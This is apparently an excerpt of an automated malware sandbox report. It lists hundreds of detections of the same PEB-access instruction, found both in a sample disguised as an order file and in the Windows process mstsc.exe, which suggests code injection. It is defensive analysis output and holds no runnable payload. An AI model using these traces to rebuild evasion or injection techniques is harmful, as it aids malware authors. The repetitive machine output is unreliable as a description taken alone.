          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]1_2_01924A2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01924A2C mov eax, dword ptr fs:[00000030h]1_2_01924A2C
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01974257 mov eax, dword ptr fs:[00000030h]1_2_01974257
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9240 mov eax, dword ptr fs:[00000030h]1_2_018E9240
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F7E41 mov eax, dword ptr fs:[00000030h]1_2_018F7E41
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AEA55 mov eax, dword ptr fs:[00000030h]1_2_019AEA55
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]1_2_019AAE44
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AAE44 mov eax, dword ptr fs:[00000030h]1_2_019AAE44
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F766D mov eax, dword ptr fs:[00000030h]1_2_018F766D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190AE73 mov eax, dword ptr fs:[00000030h]1_2_0190AE73
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192927A mov eax, dword ptr fs:[00000030h]1_2_0192927A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]1_2_0199B260
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0199B260 mov eax, dword ptr fs:[00000030h]1_2_0199B260
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8A62 mov eax, dword ptr fs:[00000030h]1_2_019B8A62
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov ecx, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0F0BF mov eax, dword ptr fs:[00000030h]3_2_04B0F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0 mov eax, dword ptr fs:[00000030h]3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B190AF mov eax, dword ptr fs:[00000030h]3_2_04B190AF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9080 mov eax, dword ptr fs:[00000030h]3_2_04AD9080
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]3_2_04B53884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53884 mov eax, dword ptr fs:[00000030h]3_2_04B53884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE849B mov eax, dword ptr fs:[00000030h]3_2_04AE849B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD58EC mov eax, dword ptr fs:[00000030h]3_2_04AD58EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B914FB mov eax, dword ptr fs:[00000030h]3_2_04B914FB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56CF0 mov eax, dword ptr fs:[00000030h]3_2_04B56CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov ecx, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6B8D0 mov eax, dword ptr fs:[00000030h]3_2_04B6B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8CD6 mov eax, dword ptr fs:[00000030h]3_2_04BA8CD6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB02A mov eax, dword ptr fs:[00000030h]3_2_04AEB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0BC2C mov eax, dword ptr fs:[00000030h]3_2_04B0BC2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0002D mov eax, dword ptr fs:[00000030h]3_2_04B0002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]3_2_04B57016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]3_2_04BA4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]3_2_04BA4015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]3_2_04BA740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]3_2_04B91C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]3_2_04B56C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]3_2_04B56C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]3_2_04B56C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]3_2_04B56C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF746D mov eax, dword ptr fs:[00000030h]3_2_04AF746D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B92073 mov eax, dword ptr fs:[00000030h]3_2_04B92073
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1074 mov eax, dword ptr fs:[00000030h]3_2_04BA1074
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6C450 mov eax, dword ptr fs:[00000030h]3_2_04B6C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6C450 mov eax, dword ptr fs:[00000030h]3_2_04B6C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A44B mov eax, dword ptr fs:[00000030h]3_2_04B0A44B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF0050 mov eax, dword ptr fs:[00000030h]3_2_04AF0050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF0050 mov eax, dword ptr fs:[00000030h]3_2_04AF0050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]3_2_04B01DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]3_2_04B01DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]3_2_04B01DB5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]3_2_04B551BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]3_2_04B551BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]3_2_04B551BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]3_2_04B551BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B061A0 mov eax, dword ptr fs:[00000030h]3_2_04B061A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B061A0 mov eax, dword ptr fs:[00000030h]3_2_04B061A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B035A1 mov eax, dword ptr fs:[00000030h]3_2_04B035A1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B569A6 mov eax, dword ptr fs:[00000030h]3_2_04B569A6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA05AC mov eax, dword ptr fs:[00000030h]3_2_04BA05AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA05AC mov eax, dword ptr fs:[00000030h]3_2_04BA05AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02990 mov eax, dword ptr fs:[00000030h]3_2_04B02990
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]3_2_04AD2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]3_2_04AD2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]3_2_04AD2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]3_2_04AD2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]3_2_04AD2D8A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FD9B mov eax, dword ptr fs:[00000030h]3_2_04B0FD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FD9B mov eax, dword ptr fs:[00000030h]3_2_04B0FD9B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC182 mov eax, dword ptr fs:[00000030h]3_2_04AFC182
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]3_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]3_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]3_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]3_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A185 mov eax, dword ptr fs:[00000030h]3_2_04B0A185
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B88DF1 mov eax, dword ptr fs:[00000030h]3_2_04B88DF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]3_2_04ADB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]3_2_04ADB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]3_2_04ADB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E0 mov eax, dword ptr fs:[00000030h]3_2_04AED5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E0 mov eax, dword ptr fs:[00000030h]3_2_04AED5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]3_2_04B9FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]3_2_04B9FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]3_2_04B9FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]3_2_04B9FDE2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B641E8 mov eax, dword ptr fs:[00000030h]3_2_04B641E8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov ecx, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]3_2_04B56DC9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9E539 mov eax, dword ptr fs:[00000030h]3_2_04B9E539
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B5A537 mov eax, dword ptr fs:[00000030h]3_2_04B5A537
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0513A mov eax, dword ptr fs:[00000030h]3_2_04B0513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0513A mov eax, dword ptr fs:[00000030h]3_2_04B0513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]3_2_04B04D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]3_2_04B04D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]3_2_04B04D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8D34 mov eax, dword ptr fs:[00000030h]3_2_04BA8D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov ecx, dword ptr fs:[00000030h]3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]3_2_04AE3D34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAD30 mov eax, dword ptr fs:[00000030h]3_2_04ADAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]3_2_04AD9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]3_2_04AD9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]3_2_04AD9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC962 mov eax, dword ptr fs:[00000030h]3_2_04ADC962
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC577 mov eax, dword ptr fs:[00000030h]3_2_04AFC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC577 mov eax, dword ptr fs:[00000030h]3_2_04AFC577
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB171 mov eax, dword ptr fs:[00000030h]3_2_04ADB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB171 mov eax, dword ptr fs:[00000030h]3_2_04ADB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFB944 mov eax, dword ptr fs:[00000030h]3_2_04AFB944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFB944 mov eax, dword ptr fs:[00000030h]3_2_04AFB944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B13D43 mov eax, dword ptr fs:[00000030h]3_2_04B13D43
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53540 mov eax, dword ptr fs:[00000030h]3_2_04B53540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF7D50 mov eax, dword ptr fs:[00000030h]3_2_04AF7D50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FAB0 mov eax, dword ptr fs:[00000030h]3_2_04B0FAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]3_2_04AD52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]3_2_04AD52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]3_2_04AD52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]3_2_04AD52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]3_2_04AD52A5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B546A7 mov eax, dword ptr fs:[00000030h]3_2_04B546A7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEAAB0 mov eax, dword ptr fs:[00000030h]3_2_04AEAAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEAAB0 mov eax, dword ptr fs:[00000030h]3_2_04AEAAB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]3_2_04BA0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]3_2_04BA0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]3_2_04BA0EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0D294 mov eax, dword ptr fs:[00000030h]3_2_04B0D294
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0D294 mov eax, dword ptr fs:[00000030h]3_2_04B0D294
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6FE87 mov eax, dword ptr fs:[00000030h]3_2_04B6FE87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE76E2 mov eax, dword ptr fs:[00000030h]3_2_04AE76E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B016E0 mov ecx, dword ptr fs:[00000030h]3_2_04B016E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02AE4 mov eax, dword ptr fs:[00000030h]3_2_04B02AE4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8ED6 mov eax, dword ptr fs:[00000030h]3_2_04BA8ED6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B18EC7 mov eax, dword ptr fs:[00000030h]3_2_04B18EC7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8FEC0 mov eax, dword ptr fs:[00000030h]3_2_04B8FEC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02ACB mov eax, dword ptr fs:[00000030h]3_2_04B02ACB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B036CC mov eax, dword ptr fs:[00000030h]3_2_04B036CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8FE3F mov eax, dword ptr fs:[00000030h]3_2_04B8FE3F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADE620 mov eax, dword ptr fs:[00000030h]3_2_04ADE620
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B14A2C mov eax, dword ptr fs:[00000030h]3_2_04B14A2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B14A2C mov eax, dword ptr fs:[00000030h]3_2_04B14A2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE8A0A mov eax, dword ptr fs:[00000030h]3_2_04AE8A0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A61C mov eax, dword ptr fs:[00000030h]3_2_04B0A61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A61C mov eax, dword ptr fs:[00000030h]3_2_04B0A61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]3_2_04ADC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]3_2_04ADC600
